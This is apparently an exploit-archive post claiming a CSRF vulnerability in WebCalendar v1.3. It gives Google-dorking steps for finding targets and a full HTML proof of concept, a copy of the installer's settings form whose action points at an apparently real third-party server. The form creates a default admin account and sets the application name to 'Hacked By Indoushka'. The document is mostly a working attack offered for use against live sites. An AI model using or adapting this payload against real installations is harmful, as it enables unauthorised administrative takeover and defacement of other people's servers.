====================================================================================================================================
| # Title     : WebCalendar v1.3 CSRF Vulnerability                                                                                |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | 
| # Vendor    : https://github.com/craigk5n/webcalendar/archive/master.zip                                                         |  
| # Dork      : WebCalendar v1.3                                                                                                   |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 173.

[+] Set the target site link Save changes and apply . 

[+] infected file : install/index.php.

[+] http://127.0.0.1/q7.3/admin/settings.php.

[+] save code as poc.html .

[+] <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  <head>
    <title>WebCalendar Setup Wizard</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <script>
<!-- <![CDATA[
      var xlate = [];
      xlate['invalidColor'] = 'Invalid Color';

      function testPHPInfo() {
        var url = "index.php?action=phpinfo";

        window.open( url, 'wcTestPHPInfo', 'width=800,height=600,resizable=yes,scrollbars=yes' );
      }
      function validate( form ) {
        // Only check to make sure single-user login is specified
        // if in single-user mode.
        var
          err = '',
          form = document.form_app_settings,
          listid = 0; // Find id of single user object.

        for( i = 0; i < form.form_user_inc.length; i++ ) {
          if( form.form_user_inc.options[i].value == 'none' )
            listid = i;
        }
        if( form.form_user_inc.options[listid].selected ) {
          if( form.form_single_user_login.value.length == 0 ) {
            // No single user login specified.
            alert( 'Error: You must specify a\nSingle-User Login.' );
            form.form_single_user_login.focus();
            return false;
          }
        }
        if( form.form_server_url.value == '' ) {
          err += "Server URL is required.\n";
          form.form_server_url.select();
          form.form_server_url.focus();
        }
        else if( form.form_server_url.value.charAt(
          form.form_server_url.value.length - 1 ) != '/' ) {
          err += "Server URL must end with a slash(/).\n";
          form.form_server_url.select();
          form.form_server_url.focus();
        }
        if( err != '' ) {
          alert( "Error:\n\n" + err );
          return false;
        }
        // Submit form...
        form.submit();
      }
      function auth_handler() {
        var
          form = document.form_app_settings,
          listid = 0; // Find id of single user object.
        for( i = 0; i < form.form_user_inc.length; i++ ) {
          if( form.form_user_inc.options[i].value == 'none' )
            listid = i;
        }
        if( form.form_user_inc.options[listid].selected ) {
          makeVisible( 'singleuser' );
        } else {
          makeInvisible( 'singleuser' );
        }
      }
      function db_type_handler() {
        var
          form = document.dbform,
          listid = 0,
          selectvalue = form.form_db_type.value;

        if( selectvalue == 'sqlite' || $db_type == 'sqlite3'
            || selectvalue == 'ibase' ) {
          form.form_db_database.size = 65;
          document.getElementById( 'db_name' ).innerHTML = 'Database Name: Full Path (no backslashes)';
        } else {
          form.form_db_database.size = 20;
          document.getElementById( 'db_name' ).innerHTML = 'Database Name: ';
        }
      }
      function chkPassword() {
        var
          form = document.dbform,
          db_pass = form.form_db_password.value,
          illegalChars = /\#/;
          // Do not allow #.../\#/ would stop all non-alphanumeric.

        if( illegalChars.test( db_pass ) ) {
          alert( 'The password contains illegal characters.' );
          form.form_db_password.select();
          form.form_db_password.focus();
          return false;
        }
      }
//]]> -->
    </script>
    <script src="../includes/js/visible.js"></script>
    <style>
      body {
        margin:0;
        background:#fff;
        font-family:Arial, Helvetica, sans-serif;
      }
      table {
        border:0;
      }
      th.header,
      th.pageheader,
      th.redheader {
        background:#eee;
      }
      th.pageheader {
        padding:10px;
        font-size:18px;
      }
      th.header,
      th.redheader {
        font-size:14px;
      }
      th.redheader,
      .notrecommended {
        color:red;
      }
      td {
        padding:5px;
      }
      td.prompt,
      td.subprompt {
        padding-right:20px;
        font-weight:bold;
      }
      td.subprompt {
        font-size:12px;
      }
      div.nav {
        margin:0;
        border-bottom:1px solid #000;
      }
      div.main {
        margin:10px;
      }
      li {
        margin-top:10px;
      }
      doc.li {
        margin-top:5px;
      }
      .recommended {
        color:green;
      }
    </style>
  </head>
  <body onload="auth_handler();">
    <table border="1" width="90%" class="aligncenter">
      <th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th>
      <tr>
        <td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td>
      </tr>
      <th class="header" colspan="2">Application Settings</th>
      <tr>
        <td colspan="2">
          <ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select &#39;Web Server&#39; from the &#39;User Authentication&#39; choices below.</li></ul>
        </td>
      </tr>
      <tr>
        <td>
          <table width="75%" class="aligncenter">
            <tr>
            <form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&amp;page=4" method="post" enctype='multipart/form-data' name="form_app_settings">
              <input type="hidden" name="app_settings" value="1" />
              <td class="prompt">Create Default Admin Account:</td>
              <td>
                <input type="checkbox" name="load_admin" value="Yes" />
                <span class="notrecommended"> (Admin Account Not Found)</span>
              </td>
            </tr>
            <tr>
              <td class="prompt">Application Name:</td>
              <td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td>
            </tr>
            <tr>
              <td class="prompt">Server URL:</td>
              <td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td>
            </tr>
            <tr>
              <td class="prompt">User Authentication:</td>
              <td>
                <select name="form_user_inc" onChange="auth_handler()">
                  <option value="user.php" selected="selected">Web-based via WebCalendar (default)</option>
                  <option value="http">Web Server (not detected)</option>
                  <option value="user-imap.php">IMAP</option>
                  <option value="none" >None (Single-User)</option>
                </select>
              </td>
            </tr>
            <tr id="singleuser">
              <td class="prompt">&nbsp;&nbsp;&nbsp;Single-User Login:</td>
              <td><input name="form_single_user_login" size="20" value="" /></td>
            </tr>
            <tr>
              <td class="prompt">Read-Only:</td>
              <td>
                <input name="form_readonly" value="true" type="radio" />Yes&nbsp;&nbsp;&nbsp;&nbsp;
                <input name="form_readonly" value="false" type="radio" checked="checked" />No
              </td>
            </tr>
            <tr>
              <td class="prompt">Environment:</td>
              <td>
                <select name="form_mode">
                  <option value="prod" selected="selected">Production</option>
                  <option value="dev">Development</option>
                </select>
              </td>
            </tr>
          </table>
        </td>
      </tr>
    </table>
    <table width="80%" class="aligncenter">
      <tr>
        <td class="aligncenter">
              <input name="action" type="button" value="Save Settings" onClick="return validate();" />
              <input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" />
            </form>
        </td>
      </tr>
    </table>  </body>
</html>


Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================